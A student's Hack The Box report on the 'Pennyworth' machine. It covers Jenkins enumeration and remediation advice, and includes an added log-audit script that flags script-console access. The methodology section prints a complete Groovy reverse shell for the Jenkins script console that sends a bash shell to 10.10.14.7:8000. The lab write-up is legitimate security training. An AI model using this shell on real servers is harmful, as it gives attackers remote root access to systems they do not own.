
Week 3 HTB Report pennyworth

Report by Rowen
Table of Contents
Pen Test:
Intro and Objective
Introduction
Objective
Report – high level summary
High level summary
Recommendations
Report – Methodologies
Introduction and Objective
Introduction
This document provides comprehensive and detailed documentation
outlining the steps taken to penetrate the security and resilience of the target known
as "pennyworth." Throughout this guide, we will cover various measures and best
practices aimed at fortifying the machine against potential vulnerabilities and
security threats.

Objective
The objective of the penetration test is to discover and exploit vulnerabilities
in the machine, with the main target being to gain access to the machine and gain
administrator privileges. However, this is not for malicious purposes, as the scope of
this test is to demonstrate the process used in a concise manner while also
explaining any steps or best practices to be taken to patch or monitor the associated
vulnerabilities to secure the target machine.
Report: High level summary

Summary
I was tasked with performing the pen test against the target on the HTB
network. The test serves as a simulated attack against this specific machine.
Initially I scanned the machine to see what ports were open and what was running.
Enumerating the site pulls up a Jenkins server login, but one can still access other
pages by manipulating the site address and seeing what information the server
has. There was a script console where we can execute a reverse shell and gain
access to the machine at the root level.
Recommendations
Change default passwords, and lock down or move the script console so that
it is harder to gain access to. Also hide or filter your ports so
they accept traffic only from where you want it to come from. Logging and
auditing of the logs would also help prevent this from happening again.
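
As an added example (not part of the original report) of the log auditing recommended above, the following script flags requests to the Jenkins script console that come from outside an allowed admin network. It assumes access logs in Combined Log Format, for instance from a reverse proxy in front of Jenkins; the admin subnet, user names and log lines are constructed for illustration.

```python
import ipaddress
import re

# Assumption: Combined Log Format, e.g. from a reverse proxy in front of Jenkins.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

ADMIN_NETS = [ipaddress.ip_network("10.20.0.0/24")]  # hypothetical admin subnet

# Constructed sample lines, not taken from the target machine.
SAMPLE = [
    '10.20.0.15 - admin [12/Mar/2024:09:01:11 +0000] "GET /script HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [12/Mar/2024:09:13:00 +0000] "GET /login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [12/Mar/2024:09:13:40 +0000] "GET /computer/(built-in)/scriptText HTTP/1.1" 403 312 "-" "curl/8.0"',
    '198.51.100.23 - builduser [12/Mar/2024:09:14:02 +0000] "POST /script HTTP/1.1" 200 6144 "-" "Mozilla/5.0"',
]

def is_console(path):
    """True for /script, /scriptText and prefixed forms such as /manage/script
    or /computer/<node>/script (query string and trailing slash ignored)."""
    last = path.split("?", 1)[0].rstrip("/").rsplit("/", 1)[-1]
    return last in ("script", "scriptText")

def from_admin_net(ip, nets):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:  # hostname or garbage in the client field
        return False
    return any(addr in net for net in nets)

def find_console_hits(lines, nets=ADMIN_NETS):
    """Return one record per script console request found in the log lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_console(m["path"]):
            continue
        if m["status"] != "200":  # anything but 200: the console was not served
            outcome = "not served"
        else:
            outcome = "script submitted" if m["method"] == "POST" else "console viewed"
        hits.append({"ts": m["ts"], "ip": m["ip"], "user": m["user"],
                     "path": m["path"], "outcome": outcome,
                     "alert": not from_admin_net(m["ip"], nets)})
    return hits

if __name__ == "__main__":
    for hit in find_console_hits(SAMPLE):
        print("ALERT" if hit["alert"] else "info ", hit)
```

A "script submitted" record from outside the admin network is the event this report's finding would have produced, so it is the one to alert on first.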
Report – Methodologies
First we scan the target
(couldn’t install gobuster)
https://medium.com/@ucihamadara/oopsie-hackthebox-walktrough-dd3118051d28
// Reverse shell entered in the Jenkins script console (Groovy)
String host="10.10.14.7";
int port=8000;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();
  po.flush();
  Thread.sleep(50);
  try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();
s.close();
